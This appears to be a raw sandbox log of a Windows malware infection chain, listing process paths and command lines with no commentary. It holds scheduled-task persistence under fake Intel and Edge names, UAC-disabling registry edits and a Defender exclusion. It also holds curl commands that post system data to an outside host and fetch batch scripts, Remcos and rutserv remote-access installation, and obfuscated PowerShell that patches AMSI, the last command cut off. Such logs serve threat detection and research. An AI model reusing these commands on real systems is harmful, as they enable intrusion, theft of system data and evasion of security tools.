C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\TJEKXB16P8YU" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8940.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8940.tmp.bat
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp8F8B.tmp"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\0ZMGV3WBIMOZ" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OusSSdhPuLxi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QInBQxSBfZZAsX,[Parameter(Position=1)][Type]$LyLdkwlWQS)$ORvKUsgQbrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+'at'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'Mem'+[Char](111)+''+'r'+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'y'+[Char](112)+'e','C'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'e'+[Char](97)+'l'+[Char](101)+'d,A'+'n'+''+[Char](115)+'iCla'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'Cl'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$ORvKUsgQbrR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+'H'+'i'+''+[Char](100)+'eB'+[Char](121)+'S'+'i'+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QInBQxSBfZZAsX).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,M'+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');$ORvKUsgQbrR.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+'k'+''+'e'+'','Publ'+[Char](105)+'c'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$LyLdkwlWQS,$QInBQxSBfZZAsX).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+'na'+'g'+''+'e'+''+'d'+'');Write-Output $ORvKUsgQbrR.CreateType();}$BSBNuHYFkbUyt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+'.'+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'c'+'r'+'o'+[Char](115)+'o'+'f'+'t.'+'W'+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$ZBAXfvmULcfjxM=$BSBNuHYFkbUyt.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dSubbgjffuYELrORmmy=OusSSdhPuLxi @([String])([IntPtr]);$SZRwYTmJmiiiHaTsOfzHWm=OusSSdhPuLxi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aGfEDqWahrc=$BSBNuHYFkbUyt.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$eBAdzaQknFGZQN=$ZBAXfvmULcfjxM.Invoke($Null,@([Object]$aGfEDqWahrc,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$FRhoKnJoYBDxOeQMU=$ZBAXfvmULcfjxM.Invoke($Null,@([Object]$aGfEDqWahrc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+'r'+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$LVaUOWQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eBAdzaQknFGZQN,$dSubbgjffuYELrORmmy).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+'ll');$XPthUEgwNOjZyIAIp=$ZBAXfvmULcfjxM.Invoke($Null,@([Object]$LVaUOWQ,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$iDexgLQdEY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FRhoKnJoYBDxOeQMU,$SZRwYTmJmiiiHaTsOfzHWm).Invoke($XPthUEgwNOjZyIAIp,[uint32]8,4,[ref]$iDexgLQdEY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XPthUEgwNOjZyIAIp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FRhoKnJoYBDxOeQMU,$SZRwYTmJmiiiHaTsOfzHWm).Invoke($XPthUEgwNOjZyIAIp,[uint32]8,0x20,[ref]$iDexgLQdEY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+'A'+[Char](82)+''+'E'+'').GetValue(''+'r'+'u'+'t'+''+'s'+''+[Char](115)+'ta'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d6041156-b889-464b-8b38-c9e6ef863c21}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WlncqTHGvucm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TTKOZQvOgZHXbv,[Parameter(Position=1)][Type]$jhmUMoYGDW)$UZHZLRmKXRD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+'m'+'o'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+'at'+'e'+''+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+'ss,'+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+''+'A'+'ns'+'i'+'Cl'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$UZHZLRmKXRD.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+'e'+',H'+'i'+''+[Char](100)+'e'+'B'+'y'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TTKOZQvOgZHXbv).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+'m'+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+'g'+'ed');$UZHZLRmKXRD.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+'S'+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$jhmUMoYGDW,$TTKOZQvOgZHXbv).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $UZHZLRmKXRD.CreateType();}$mZuNEiLyRtCUp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+'icro'+'s'+'of'+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+''+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+'s'+'');$caQOLnnOVyUQtA=$mZuNEiLyRtCUp.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+'d'+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object 